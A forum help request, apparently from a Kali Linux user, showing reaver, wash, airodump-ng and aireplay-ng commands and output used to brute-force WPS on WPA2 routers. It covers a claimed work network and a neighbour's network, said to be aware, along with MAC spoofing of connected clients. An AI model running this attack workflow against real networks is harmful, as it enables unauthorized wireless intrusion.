I have successfully cracked a WPA2 network at work using reaver, of course in order to see if it is locked I had to check it with wash, I was able to do this only after mkdir /etc/reaver/.
However, when I'm trying to breach my neighbour (who's aware of this) this is the result of wash.
Code:
root@kali:~# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID Channel RSSI WPS Version WPS Locked ESSID
--------------------------------------------------------------------------------------------------------------
And the result of airodump-ng mon0 -c 1
Code:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:xx:xx:xx:xx -51 100 86 0 0 1 54e. WPA2 CCMP PSK xxxxxxxxx
Standard Reaver command results in "switching mon0 to channel1" which lasts forever.
Code:
root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 1
Then I'm going more hardcore with -L and -A and I get to another infinite loop:
Code:
root@kali:~# reaver -i mon0 -b xx;xx:xx:xx:xx:xx -vv -L -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from xx:xx:xx;xx:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with xx:xx;xx;xx:xx (ESSID: xxxxxxxxxxxxxx)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
I've tested tons of variations, still nothing.
Aireplay-ng -9 mon0 results:
Code:
root@kali:~# aireplay-ng -9 mon0
10:49:41 Trying broadcast probe requests...
10:49:41 Injection is working!
10:49:42 Found 1 AP
10:49:42 Trying directed probe requests...
10:49:42 00:xx:xx:xx:xx:xx - channel: 1 - 'xxxxxxxxx'
10:49:43 Ping (min/avg/max): 1.553ms/9.367ms/124.480ms Power: -72.50
10:49:43 30/30: 100%
Aireplay injection test
aireplay-ng -9 -e xxxxxx -a 00:xx:xx:xx:xx:xx -i wlan1 wlan0
Code:
root@kali:~# aireplay-ng -9 -e xxxxxxxxxxxx -a 0x:xx:xx:xx:xx:xx -i wlan1 wlan0
10:55:01 Waiting for beacon frame (BSSID: 00:xx:xx:xx:xx:xx) on channel 1
10:55:01 Trying broadcast probe requests...
10:55:01 Injection is working!
10:55:03 Found 1 AP
10:55:03 Trying directed probe requests...
10:55:03 xx:xx:xx;xx:xx:xx - channel: 1 - 'xxxxxxxxx'
10:55:03 Ping (min/avg/max): 1.134ms/8.493ms/73.599ms Power: -39.57
10:55:03 30/30: 100%
10:55:03 Trying card-to-card injection...
10:55:03 Attack -0: OK
10:55:03 Attack -1 (open): OK
10:55:03 Attack -1 (psk): OK
10:55:03 Attack -2/-3/-4/-6: OK
10:55:03 Attack -5/-7: OK
And I can't do anything about it...
I'm using 2 wireless cards, Atheros AR9285 and Atheros AR9271.
airmon-ng check kill doesn't help either.
Spoofing card's mac(I've got the mac of 2 PCs which are connected to this network, tried to reaver it when they were disconnected) on both wlan0/mon0 and wlan1 and adding --mac=spoofedmac in reaver doesn't give me anything new.
I have also tried to update
apt-get install libcap-dev
apt-get install libsqlite3-dev
Any suggestions?